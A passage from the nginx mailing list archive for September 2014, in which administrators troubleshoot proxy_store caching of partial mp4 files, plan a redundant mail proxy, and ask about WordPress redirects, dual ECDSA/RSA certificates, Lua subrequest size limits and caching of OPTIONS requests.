> proxy_pass http://fl008.files.net:80; > } > > > > location @fetch { > internal; > proxy_pass http://fl008.origin.com:80; > proxy_store on; > proxy_store_access user:rw group:rw all:r; > root /var/www/html/tunefiles; > } Do you have the mp4 module enabled at the origin? If so then you have partial mp4 downloaded from there and stored locally. Note proxy_pass without URI passes client URIs to the origin keeping the arguments (including ?start?). From shahzaib.cb at gmail.com Thu Sep 18 11:25:33 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 18 Sep 2014 16:25:33 +0500 Subject: Proxy_store downloading half videos !! In-Reply-To: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> References: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> Message-ID: Yes, the mp4 modules is enabled on origin as well as edge. Could you please help me resolving the issue ? On Thu, Sep 18, 2014 at 4:21 PM, Roman Arutyunyan wrote: > > On 18 Sep 2014, at 14:49, shahzaib shahzaib wrote: > > > Hi, > > > > We're using proxy_store on the edge server for replicating requested > mp4 files and some of our users reported that some of the videos are half > sized and therefore they are unable to stream whole video file on their end > (coming from the edge server). On digging into the access_logs of nginx, i > found the 500 internal server errors for 10~20 videos and on checking the > size of 500 error videos it was half of the size compare to the mirrored > video files on the origin. Please check the following error of the culprit > video link :- > > > > 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET > /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 > 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 > (compatible; MSIE 8.0; Windows NT 6.0)" > > > > I'd like to inform that the issue is coming for 40% of the videos. > > > > error_log :- > > > > 2014/09/18 15:30:40 [error] 3883#0: *77490 > "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start > time exceeds file duration, client: 175.110.88.213, server: lw3.files.com, > request: "GET /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 > HTTP/1.1" > > > > You can see the "start time exceeds error" on edge server but the video > link starting from start=736.8 exists on origin server. > > > > Nginx config :- > > > > server { > > > > listen 80; > > server_name lw3.files.com; > > root /var/www/html/tunefiles; > > location ~ \.(mp4|jpeg|jpg)$ { > > root /var/www/html/tunefiles; > > mp4; > > error_page 404 = @fetch; > > > > } > > > > > > location ~ \.(php)$ { > > proxy_pass http://fl008.files.net:80; > > } > > > > > > > > location @fetch { > > internal; > > proxy_pass http://fl008.origin.com:80; > > proxy_store on; > > proxy_store_access user:rw group:rw all:r; > > root /var/www/html/tunefiles; > > } > > Do you have the mp4 module enabled at the origin? If so then you have > partial mp4 > downloaded from there and stored locally. Note proxy_pass without URI > passes > client URIs to the origin keeping the arguments (including ?start?). > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nmilas at noa.gr Thu Sep 18 12:02:38 2014 From: nmilas at noa.gr (Nikolaos Milas) Date: Thu, 18 Sep 2014 15:02:38 +0300 Subject: Building a redundant mail service Message-ID: <541AC9DE.7000305@noa.gr> Hello, I would appreciate your advice on the following: We are trying to build a redundant mail service, and we are investigating the use of nginx as smtp/pop3/imap proxy with TLS/SSL support (ports 25/587, 143/993, 110/995). We already have two production mail servers, vmail1 and vmail2, running postfix/dovecot (with virtual users on LDAP), each running on a separate data center. vmail1 is the main one (i.e. the one used to send mail and host users' mailboxes), vmail2 is only used as a backup. Mailboxes are using Maildir format and are being synced (in near real-time) using dovecot dsync service. IMPORTANT: Each of the two servers has its own distinct server name and its own separate certificate. This allows proper parallel operation of postfix and dovecot IMAP syncing. (I will not describe the incoming mail process, because it is beyond the scope of this mail.) Our goal is to allow our users to always use one address, say *vmail.example.com*, to automatically access SMTP/POP3/IMAP services at vmail1 and, only if vmail1 is down, at vmail2. DNS could offer a solution: creating, for example, a CNAME "vmail.example.com" pointing to vmail1 would probably solve the problem by using a very low DNS record refresh time and use a script to monitor vmail1 availability; if vmail1 is down, the script could update the CNAME to point to vmail2 instead (and force a zone refresh). This could leave a small downtime window (depending on the refresh time configured). Yet, I am thinking that it may be more advantageous to use another two *identical* VMs (one on each data center, for redundancy) running NGINX, with the common name (and a common certificate for) vmail.example.com (in DNS: an A record with two IP Addresses). Both proxies would automatically redirect (via NGINX) all SMTP/POP3/IMAP requests to vmail1 and, only if vmail1 is down, to vmail2, while the user will always see/configure vmail.example.com as their mail server. Is this a feasible scenario? Any hints, experiences, configuration advice, pitfalls, alternative approaches etc. would be greatly appreciated. Please advise. Thanks in advance, Nick From arut at nginx.com Thu Sep 18 13:29:21 2014 From: arut at nginx.com (Roman Arutyunyan) Date: Thu, 18 Sep 2014 17:29:21 +0400 Subject: Proxy_store downloading half videos !! In-Reply-To: References: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> Message-ID: Try this directive instead of yours to download the entire file from the backend proxy_pass http://fl008.origin.com$uri; On 18 Sep 2014, at 15:25, shahzaib shahzaib wrote: > Yes, the mp4 modules is enabled on origin as well as edge. Could you please help me resolving the issue ? > > On Thu, Sep 18, 2014 at 4:21 PM, Roman Arutyunyan wrote: > > On 18 Sep 2014, at 14:49, shahzaib shahzaib wrote: > > > Hi, > > > > We're using proxy_store on the edge server for replicating requested mp4 files and some of our users reported that some of the videos are half sized and therefore they are unable to stream whole video file on their end (coming from the edge server). On digging into the access_logs of nginx, i found the 500 internal server errors for 10~20 videos and on checking the size of 500 error videos it was half of the size compare to the mirrored video files on the origin. Please check the following error of the culprit video link :- > > > > 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" > > > > I'd like to inform that the issue is coming for 40% of the videos. > > > > error_log :- > > > > 2014/09/18 15:30:40 [error] 3883#0: *77490 "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start time exceeds file duration, client: 175.110.88.213, server: lw3.files.com, request: "GET /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 HTTP/1.1" > > > > You can see the "start time exceeds error" on edge server but the video link starting from start=736.8 exists on origin server. > > > > Nginx config :- > > > > server { > > > > listen 80; > > server_name lw3.files.com; > > root /var/www/html/tunefiles; > > location ~ \.(mp4|jpeg|jpg)$ { > > root /var/www/html/tunefiles; > > mp4; > > error_page 404 = @fetch; > > > > } > > > > > > location ~ \.(php)$ { > > proxy_pass http://fl008.files.net:80; > > } > > > > > > > > location @fetch { > > internal; > > proxy_pass http://fl008.origin.com:80; > > proxy_store on; > > proxy_store_access user:rw group:rw all:r; > > root /var/www/html/tunefiles; > > } > > Do you have the mp4 module enabled at the origin? If so then you have partial mp4 > downloaded from there and stored locally. Note proxy_pass without URI passes > client URIs to the origin keeping the arguments (including ?start?). > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From shahzaib.cb at gmail.com Thu Sep 18 13:32:26 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 18 Sep 2014 18:32:26 +0500 Subject: Proxy_store downloading half videos !! In-Reply-To: References: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> Message-ID: Thanks a lot for the solution Roman, i'll get back to you after applying the fix. :-) On Thu, Sep 18, 2014 at 6:29 PM, Roman Arutyunyan wrote: > > Try this directive instead of yours to download the entire file from the > backend > > proxy_pass http://fl008.origin.com$uri; > > > On 18 Sep 2014, at 15:25, shahzaib shahzaib wrote: > > > Yes, the mp4 modules is enabled on origin as well as edge. Could you > please help me resolving the issue ? > > > > On Thu, Sep 18, 2014 at 4:21 PM, Roman Arutyunyan > wrote: > > > > On 18 Sep 2014, at 14:49, shahzaib shahzaib > wrote: > > > > > Hi, > > > > > > We're using proxy_store on the edge server for replicating > requested mp4 files and some of our users reported that some of the videos > are half sized and therefore they are unable to stream whole video file on > their end (coming from the edge server). On digging into the access_logs of > nginx, i found the 500 internal server errors for 10~20 videos and on > checking the size of 500 error videos it was half of the size compare to > the mirrored video files on the origin. Please check the following error of > the culprit video link :- > > > > > > 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET > /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 > 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 > (compatible; MSIE 8.0; Windows NT 6.0)" > > > > > > I'd like to inform that the issue is coming for 40% of the videos. > > > > > > error_log :- > > > > > > 2014/09/18 15:30:40 [error] 3883#0: *77490 > "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start > time exceeds file duration, client: 175.110.88.213, server: lw3.files.com, > request: "GET /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 > HTTP/1.1" > > > > > > You can see the "start time exceeds error" on edge server but the > video link starting from start=736.8 exists on origin server. > > > > > > Nginx config :- > > > > > > server { > > > > > > listen 80; > > > server_name lw3.files.com; > > > root /var/www/html/tunefiles; > > > location ~ \.(mp4|jpeg|jpg)$ { > > > root /var/www/html/tunefiles; > > > mp4; > > > error_page 404 = @fetch; > > > > > > } > > > > > > > > > location ~ \.(php)$ { > > > proxy_pass http://fl008.files.net:80; > > > } > > > > > > > > > > > > location @fetch { > > > internal; > > > proxy_pass http://fl008.origin.com:80; > > > proxy_store on; > > > proxy_store_access user:rw group:rw all:r; > > > root /var/www/html/tunefiles; > > > } > > > > Do you have the mp4 module enabled at the origin? If so then you have > partial mp4 > > downloaded from there and stored locally. Note proxy_pass without URI > passes > > client URIs to the origin keeping the arguments (including ?start?). > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From shahzaib.cb at gmail.com Thu Sep 18 13:43:24 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 18 Sep 2014 18:43:24 +0500 Subject: Proxy_store downloading half videos !! In-Reply-To: References: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> Message-ID: >>proxy_pass http://fl008.origin.com$uri; It didn't work instead the error 502 gateway started to show up when proxying the request via proxy_pass. On Thu, Sep 18, 2014 at 6:32 PM, shahzaib shahzaib wrote: > Thanks a lot for the solution Roman, i'll get back to you after applying > the fix. :-) > > On Thu, Sep 18, 2014 at 6:29 PM, Roman Arutyunyan wrote: > >> >> Try this directive instead of yours to download the entire file from the >> backend >> >> proxy_pass http://fl008.origin.com$uri; >> >> >> On 18 Sep 2014, at 15:25, shahzaib shahzaib >> wrote: >> >> > Yes, the mp4 modules is enabled on origin as well as edge. Could you >> please help me resolving the issue ? >> > >> > On Thu, Sep 18, 2014 at 4:21 PM, Roman Arutyunyan >> wrote: >> > >> > On 18 Sep 2014, at 14:49, shahzaib shahzaib >> wrote: >> > >> > > Hi, >> > > >> > > We're using proxy_store on the edge server for replicating >> requested mp4 files and some of our users reported that some of the videos >> are half sized and therefore they are unable to stream whole video file on >> their end (coming from the edge server). On digging into the access_logs of >> nginx, i found the 500 internal server errors for 10~20 videos and on >> checking the size of 500 error videos it was half of the size compare to >> the mirrored video files on the origin. Please check the following error of >> the culprit video link :- >> > > >> > > 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET >> /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 >> 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 >> (compatible; MSIE 8.0; Windows NT 6.0)" >> > > >> > > I'd like to inform that the issue is coming for 40% of the videos. >> > > >> > > error_log :- >> > > >> > > 2014/09/18 15:30:40 [error] 3883#0: *77490 >> "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start >> time exceeds file duration, client: 175.110.88.213, server: lw3.files.com, >> request: "GET /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 >> HTTP/1.1" >> > > >> > > You can see the "start time exceeds error" on edge server but the >> video link starting from start=736.8 exists on origin server. >> > > >> > > Nginx config :- >> > > >> > > server { >> > > >> > > listen 80; >> > > server_name lw3.files.com; >> > > root /var/www/html/tunefiles; >> > > location ~ \.(mp4|jpeg|jpg)$ { >> > > root /var/www/html/tunefiles; >> > > mp4; >> > > error_page 404 = @fetch; >> > > >> > > } >> > > >> > > >> > > location ~ \.(php)$ { >> > > proxy_pass http://fl008.files.net:80; >> > > } >> > > >> > > >> > > >> > > location @fetch { >> > > internal; >> > > proxy_pass http://fl008.origin.com:80; >> > > proxy_store on; >> > > proxy_store_access user:rw group:rw all:r; >> > > root /var/www/html/tunefiles; >> > > } >> > >> > Do you have the mp4 module enabled at the origin? If so then you have >> partial mp4 >> > downloaded from there and stored locally. Note proxy_pass without URI >> passes >> > client URIs to the origin keeping the arguments (including ?start?). >> > >> > _______________________________________________ >> > nginx mailing list >> > nginx at nginx.org >> > http://mailman.nginx.org/mailman/listinfo/nginx >> > >> > _______________________________________________ >> > nginx mailing list >> > nginx at nginx.org >> > http://mailman.nginx.org/mailman/listinfo/nginx >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From shahzaib.cb at gmail.com Thu Sep 18 13:45:15 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 18 Sep 2014 18:45:15 +0500 Subject: Proxy_store downloading half videos !! In-Reply-To: References: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> Message-ID: Looks like on using the proxy_pass http://fl008.origin.com:80 $uri; it worked . Could :80 be the issue ? On Thu, Sep 18, 2014 at 6:43 PM, shahzaib shahzaib wrote: > >>proxy_pass http://fl008.origin.com$uri; > It didn't work instead the error 502 gateway started to show up when > proxying the request via proxy_pass. > > On Thu, Sep 18, 2014 at 6:32 PM, shahzaib shahzaib > wrote: > >> Thanks a lot for the solution Roman, i'll get back to you after applying >> the fix. :-) >> >> On Thu, Sep 18, 2014 at 6:29 PM, Roman Arutyunyan wrote: >> >>> >>> Try this directive instead of yours to download the entire file from the >>> backend >>> >>> proxy_pass http://fl008.origin.com$uri; >>> >>> >>> On 18 Sep 2014, at 15:25, shahzaib shahzaib >>> wrote: >>> >>> > Yes, the mp4 modules is enabled on origin as well as edge. Could you >>> please help me resolving the issue ? >>> > >>> > On Thu, Sep 18, 2014 at 4:21 PM, Roman Arutyunyan >>> wrote: >>> > >>> > On 18 Sep 2014, at 14:49, shahzaib shahzaib >>> wrote: >>> > >>> > > Hi, >>> > > >>> > > We're using proxy_store on the edge server for replicating >>> requested mp4 files and some of our users reported that some of the videos >>> are half sized and therefore they are unable to stream whole video file on >>> their end (coming from the edge server). On digging into the access_logs of >>> nginx, i found the 500 internal server errors for 10~20 videos and on >>> checking the size of 500 error videos it was half of the size compare to >>> the mirrored video files on the origin. Please check the following error of >>> the culprit video link :- >>> > > >>> > > 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET >>> /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 >>> 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 >>> (compatible; MSIE 8.0; Windows NT 6.0)" >>> > > >>> > > I'd like to inform that the issue is coming for 40% of the videos. >>> > > >>> > > error_log :- >>> > > >>> > > 2014/09/18 15:30:40 [error] 3883#0: *77490 >>> "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start >>> time exceeds file duration, client: 175.110.88.213, server: >>> lw3.files.com, request: "GET >>> /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 HTTP/1.1" >>> > > >>> > > You can see the "start time exceeds error" on edge server but the >>> video link starting from start=736.8 exists on origin server. >>> > > >>> > > Nginx config :- >>> > > >>> > > server { >>> > > >>> > > listen 80; >>> > > server_name lw3.files.com; >>> > > root /var/www/html/tunefiles; >>> > > location ~ \.(mp4|jpeg|jpg)$ { >>> > > root /var/www/html/tunefiles; >>> > > mp4; >>> > > error_page 404 = @fetch; >>> > > >>> > > } >>> > > >>> > > >>> > > location ~ \.(php)$ { >>> > > proxy_pass http://fl008.files.net:80; >>> > > } >>> > > >>> > > >>> > > >>> > > location @fetch { >>> > > internal; >>> > > proxy_pass http://fl008.origin.com:80; >>> > > proxy_store on; >>> > > proxy_store_access user:rw group:rw all:r; >>> > > root /var/www/html/tunefiles; >>> > > } >>> > >>> > Do you have the mp4 module enabled at the origin? If so then you have >>> partial mp4 >>> > downloaded from there and stored locally. Note proxy_pass without URI >>> passes >>> > client URIs to the origin keeping the arguments (including ?start?). >>> > >>> > _______________________________________________ >>> > nginx mailing list >>> > nginx at nginx.org >>> > http://mailman.nginx.org/mailman/listinfo/nginx >>> > >>> > _______________________________________________ >>> > nginx mailing list >>> > nginx at nginx.org >>> > http://mailman.nginx.org/mailman/listinfo/nginx >>> >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >>> >> >> > -------------- next part -------------- An HTML attachment was scrubbed... URL: From pcgeopc at gmail.com Thu Sep 18 14:04:32 2014 From: pcgeopc at gmail.com (Geo P.C.) Date: Thu, 18 Sep 2014 19:34:32 +0530 Subject: Redirect to a different url based on a query. Message-ID: We have a wordpress installation and need to redirect lost password link to another different url for this we trying to setup a redirect rule but this is not working. Can anyone please help us. location / { proxy_pass http://localhost; } location wp-login.php?action=lostpassword rewrite ^(.*) http://recover.geo.com $1 permanent; } But login url too (wp-login.php?action=login) is redirecting to recover.geo.com *We need to redirect only the url wp-login.php?action=lostpassword to other and all other url including wp-login.php?action=login need to proxypass* Can anyone please help us with the correct configuration. Thanks Geo -------------- next part -------------- An HTML attachment was scrubbed... URL: From rob.stradling at comodo.com Thu Sep 18 14:29:53 2014 From: rob.stradling at comodo.com (Rob Stradling) Date: Thu, 18 Sep 2014 15:29:53 +0100 Subject: 2 certs, 1 domain, 1 IP In-Reply-To: <5419A60F.9020707@riseup.net> References: <54184F09.6090205@riseup.net> <5419A60F.9020707@riseup.net> Message-ID: <541AEC61.2040804@comodo.com> On 17/09/14 16:17, shmick at riseup.net wrote: > it works with postfix > i guess not in nginx > feature request ? Hi. You could try this patch: http://forum.nginx.org/read.php?29,243797,244306#msg-244306 It's nearly a year old so it may well need tweaking to make it apply cleanly to the latest Nginx code. I'm afraid I don't know when I'm going to find time to get it into a suitable state for the Nginx team to be happy to properly review it and (hopefully) commit it. (So if anybody else wants to take over, please be my guest). > nginx: [emerg] "ssl_certificate" directive is duplicate in > /etc/nginx.conf:53 > nginx: configuration file /etc/nginx.conf test failed > > shmick at riseup.net wrote: >> is it possible with SNI and nginx to have both an ECDSA and RSA cert >> serving 1 website on 1 IP ? >> >> best practices ? -- Rob Stradling Senior Research & Development Scientist COMODO - Creating Trust Online From nginx-forum at nginx.us Thu Sep 18 16:02:57 2014 From: nginx-forum at nginx.us (jpsonweb) Date: Thu, 18 Sep 2014 12:02:57 -0400 Subject: using location.capture to post a form In-Reply-To: References: Message-ID: <708f2d52447ea98d97ed0a96741ede4a.NginxMailingListEnglish@forum.nginx.org> Thank you Yichun, I was able to post the parameter from nginx by passing the arguments using this. local maken_res = ngx.location.capture("/test", { method = ngx.HTTP_POST, args = { pagelayout = dev_res_encoded }}); This works only when post parameter size is less than 81568 characters. When the parameter size is greater than 81568, we get error 502. is there any way to get around this limitation or is there a different way to post more than 81568 characters. Jyoti Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253311,253393#msg-253393 From agentzh at gmail.com Thu Sep 18 17:14:22 2014 From: agentzh at gmail.com (Yichun Zhang (agentzh)) Date: Thu, 18 Sep 2014 10:14:22 -0700 Subject: using location.capture to post a form In-Reply-To: <708f2d52447ea98d97ed0a96741ede4a.NginxMailingListEnglish@forum.nginx.org> References: <708f2d52447ea98d97ed0a96741ede4a.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hello! On Thu, Sep 18, 2014 at 9:02 AM, jpsonweb wrote: > I was able to post the parameter from nginx by passing the arguments using > this. > local maken_res = ngx.location.capture("/test", { method = ngx.HTTP_POST, > args = { pagelayout = dev_res_encoded }}); > You're passing your args via URI arguments rather than POST body. See https://github.com/openresty/lua-nginx-module#ngxlocationcapture "* args specify the subrequest's URI query arguments (both string value and Lua tables are accepted) " > This works only when post parameter size is less than 81568 characters. When > the parameter size is greater than 81568, we get error 502. > Apparently you're hitting the URL length limit on your backend server. BTW, it's better to post such questions to the openresty-en mailing list instead: https://groups.google.com/group/openresty-en Regards, -agentzh From shahzaib.cb at gmail.com Thu Sep 18 17:58:13 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 18 Sep 2014 22:58:13 +0500 Subject: Proxy_store downloading half videos !! In-Reply-To: References: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> Message-ID: This issue is fixed, now i am getting another issue. Whenever user requests for new file which is not yet downloaded on the edge server, user gets the 403 forbidden error on browser and on refreshing the browser, the same video started to stream as well as download. Why the proxy_store is showing 403 error on first time ? On Thu, Sep 18, 2014 at 6:45 PM, shahzaib shahzaib wrote: > Looks like on using the proxy_pass http://fl008.origin.com:80 > $uri; it worked . Could :80 be the issue ? > > On Thu, Sep 18, 2014 at 6:43 PM, shahzaib shahzaib > wrote: > >> >>proxy_pass http://fl008.origin.com$uri; >> It didn't work instead the error 502 gateway started to show up when >> proxying the request via proxy_pass. >> >> On Thu, Sep 18, 2014 at 6:32 PM, shahzaib shahzaib > > wrote: >> >>> Thanks a lot for the solution Roman, i'll get back to you after applying >>> the fix. :-) >>> >>> On Thu, Sep 18, 2014 at 6:29 PM, Roman Arutyunyan >>> wrote: >>> >>>> >>>> Try this directive instead of yours to download the entire file from >>>> the backend >>>> >>>> proxy_pass http://fl008.origin.com$uri; >>>> >>>> >>>> On 18 Sep 2014, at 15:25, shahzaib shahzaib >>>> wrote: >>>> >>>> > Yes, the mp4 modules is enabled on origin as well as edge. Could you >>>> please help me resolving the issue ? >>>> > >>>> > On Thu, Sep 18, 2014 at 4:21 PM, Roman Arutyunyan >>>> wrote: >>>> > >>>> > On 18 Sep 2014, at 14:49, shahzaib shahzaib >>>> wrote: >>>> > >>>> > > Hi, >>>> > > >>>> > > We're using proxy_store on the edge server for replicating >>>> requested mp4 files and some of our users reported that some of the videos >>>> are half sized and therefore they are unable to stream whole video file on >>>> their end (coming from the edge server). On digging into the access_logs of >>>> nginx, i found the 500 internal server errors for 10~20 videos and on >>>> checking the size of 500 error videos it was half of the size compare to >>>> the mirrored video files on the origin. Please check the following error of >>>> the culprit video link :- >>>> > > >>>> > > 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET >>>> /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 >>>> 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 >>>> (compatible; MSIE 8.0; Windows NT 6.0)" >>>> > > >>>> > > I'd like to inform that the issue is coming for 40% of the videos. >>>> > > >>>> > > error_log :- >>>> > > >>>> > > 2014/09/18 15:30:40 [error] 3883#0: *77490 >>>> "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start >>>> time exceeds file duration, client: 175.110.88.213, server: >>>> lw3.files.com, request: "GET >>>> /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 HTTP/1.1" >>>> > > >>>> > > You can see the "start time exceeds error" on edge server but the >>>> video link starting from start=736.8 exists on origin server. >>>> > > >>>> > > Nginx config :- >>>> > > >>>> > > server { >>>> > > >>>> > > listen 80; >>>> > > server_name lw3.files.com; >>>> > > root /var/www/html/tunefiles; >>>> > > location ~ \.(mp4|jpeg|jpg)$ { >>>> > > root /var/www/html/tunefiles; >>>> > > mp4; >>>> > > error_page 404 = @fetch; >>>> > > >>>> > > } >>>> > > >>>> > > >>>> > > location ~ \.(php)$ { >>>> > > proxy_pass http://fl008.files.net:80; >>>> > > } >>>> > > >>>> > > >>>> > > >>>> > > location @fetch { >>>> > > internal; >>>> > > proxy_pass http://fl008.origin.com:80; >>>> > > proxy_store on; >>>> > > proxy_store_access user:rw group:rw all:r; >>>> > > root /var/www/html/tunefiles; >>>> > > } >>>> > >>>> > Do you have the mp4 module enabled at the origin? If so then you >>>> have partial mp4 >>>> > downloaded from there and stored locally. Note proxy_pass without >>>> URI passes >>>> > client URIs to the origin keeping the arguments (including ?start?). >>>> > >>>> > _______________________________________________ >>>> > nginx mailing list >>>> > nginx at nginx.org >>>> > http://mailman.nginx.org/mailman/listinfo/nginx >>>> > >>>> > _______________________________________________ >>>> > nginx mailing list >>>> > nginx at nginx.org >>>> > http://mailman.nginx.org/mailman/listinfo/nginx >>>> >>>> _______________________________________________ >>>> nginx mailing list >>>> nginx at nginx.org >>>> http://mailman.nginx.org/mailman/listinfo/nginx >>>> >>> >>> >> > -------------- next part -------------- An HTML attachment was scrubbed... URL: From eliezer at ngtech.co.il Fri Sep 19 00:29:28 2014 From: eliezer at ngtech.co.il (Eliezer Croitoru) Date: Fri, 19 Sep 2014 03:29:28 +0300 Subject: Proxy_store downloading half videos !! In-Reply-To: References: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> Message-ID: <541B78E8.1020504@ngtech.co.il> I have seen your directives and I am not nginx expert but there was something like "try" for connections to a proxy server that will first try one direction and if not able to download from there use the other one. Take a peak here: http://forum.nginx.org/read.php?2,246125,246125 You can define two backends: store and proxy. First try store and then proxy. (I do hope I am right about the assumption) Eliezer On 09/18/2014 08:58 PM, shahzaib shahzaib wrote: > This issue is fixed, now i am getting another issue. Whenever user > requests for new file which is not yet downloaded on the edge server, > user gets the 403 forbidden error on browser and on refreshing the > browser, the same video started to stream as well as download. Why the > proxy_store is showing 403 error on first time ? > From nginx-forum at nginx.us Fri Sep 19 00:45:32 2014 From: nginx-forum at nginx.us (idabic) Date: Thu, 18 Sep 2014 20:45:32 -0400 Subject: Proxy_cache_methods and OPTIONS Message-ID: I have bounced around quite a lot through forums and documentation to demistique whether the OPTIONS request method is honoured/allowed by nginx when it's configured as reverse proxy cache system or not. I used a test box with nginx 1.4.6 with "proxy_cache_methods GET OPTIONS;" to test certain use case for a client but, reloading nginx returned obvious exception that: "invalid value "OPTIONS" in /etc/nginx/sites-enabled/default:35" Documentation says: ============================================= Syntax: proxy_cache_methods GET | HEAD | POST ...; Default: proxy_cache_methods GET HEAD; Context: http, server, location ============================================= but I dont' see 1. full list and 2. list of allowed methods when proxy_cache is configured - if it makes the difference. Anyu thoughts? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253403,253403#msg-253403 From nginx-forum at nginx.us Fri Sep 19 04:00:14 2014 From: nginx-forum at nginx.us (geopcgeo) Date: Fri, 19 Sep 2014 00:00:14 -0400 Subject: Redirect to a different url based on a query. In-Reply-To: References: Message-ID: Can anyone please help me on it.... Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253390,253405#msg-253405 From shahzaib.cb at gmail.com Fri Sep 19 06:07:32 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Fri, 19 Sep 2014 11:07:32 +0500 Subject: Proxy_store downloading half videos !! In-Reply-To: <541B78E8.1020504@ngtech.co.il> References: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> <541B78E8.1020504@ngtech.co.il> Message-ID: 403 forbidden error was due to hotlinking protection on the origin server. It was fixed. On Fri, Sep 19, 2014 at 5:29 AM, Eliezer Croitoru wrote: > I have seen your directives and I am not nginx expert but there was > something like "try" for connections to a proxy server that will first try > one direction and if not able to download from there use the other one. > > Take a peak here: > http://forum.nginx.org/read.php?2,246125,246125 > > You can define two backends: store and proxy. > First try store and then proxy. > (I do hope I am right about the assumption) > > Eliezer > > On 09/18/2014 08:58 PM, shahzaib shahzaib wrote: > >> This issue is fixed, now i am getting another issue. Whenever user >> requests for new file which is not yet downloaded on the edge server, >> user gets the 403 forbidden error on browser and on refreshing the >> browser, the same video started to stream as well as download. Why the >> proxy_store is showing 403 error on first time ? >> >> > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Fri Sep 19 07:41:07 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Fri, 19 Sep 2014 11:41:07 +0400 Subject: Proxy_cache_methods and OPTIONS In-Reply-To: References: Message-ID: <20140919074107.GT91749@mdounin.ru> Hello! On Thu, Sep 18, 2014 at 08:45:32PM -0400, idabic wrote: > I have bounced around quite a lot through forums and documentation to > demistique whether the OPTIONS request method is honoured/allowed by nginx > when it's configured as reverse proxy cache system or not. > I used a test box with nginx 1.4.6 with > > "proxy_cache_methods GET OPTIONS;" > > to test certain use case for a client but, reloading nginx returned obvious > exception that: > > "invalid value "OPTIONS" in /etc/nginx/sites-enabled/default:35" > > Documentation says: > ============================================= > Syntax: proxy_cache_methods GET | HEAD | POST ...; > Default: > > proxy_cache_methods GET HEAD; > > Context: http, server, location > ============================================= > > but I dont' see 1. full list and 2. list of allowed methods when proxy_cache > is configured - if it makes the difference. The syntax provided means that only GET, HEAD, or POST method can be specified, and there may be more than one method. As you can see, as of now OPTIONS can't be specified in proxy_cache_methods, and responses to OPTIONS requests will not be cached. This is in line with what RFC 2616 says about OPTIONS, 